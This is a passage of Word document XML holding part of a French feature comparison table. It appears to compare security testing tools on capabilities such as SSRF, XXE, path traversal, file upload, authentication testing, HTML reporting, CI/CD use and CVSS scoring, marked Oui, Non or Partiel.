              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7C385D92" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="196AB782" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2E0EA74E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="774CEB60" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B2072B4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16DD25A2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Partiel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF971D9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48915BF0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B80D251" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="681135E1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="1A2D41C4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5CEEBEA1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>XXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4E1410F6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Partiel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="72DB8B79" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6B82A68D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0E3C6A55" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3EC80324" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="363315D5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5540ACD5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Path Traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D333CCC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21B03AA6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00C6B24C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B2C5BB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="225872A6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="13178B22" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="60D969D0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0FBD3DD0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="69F90198" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="10BF046E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0B19AC22" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="72ED425B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="172B09AB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09414463" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Auth Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27E943D0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ADB3EBB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0802604E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E35580A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F7F7151" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="246EE35D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="691EA568" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rapport HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="57BC8123" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="75B30D4E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="71125142" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="66C44EC7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="140F2799" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="29FD1718" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D1524E6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLI / CI-CD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F357BA6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01D55EF5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Partiel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71A893B3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B372ACB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E71ACC0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="50AB59C6" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6D6BC949" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Score CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5B15DFFE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="713EF175" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="16C1FBB5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Non</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2AE21F4E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3FD7B0ED" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oui</w:t>
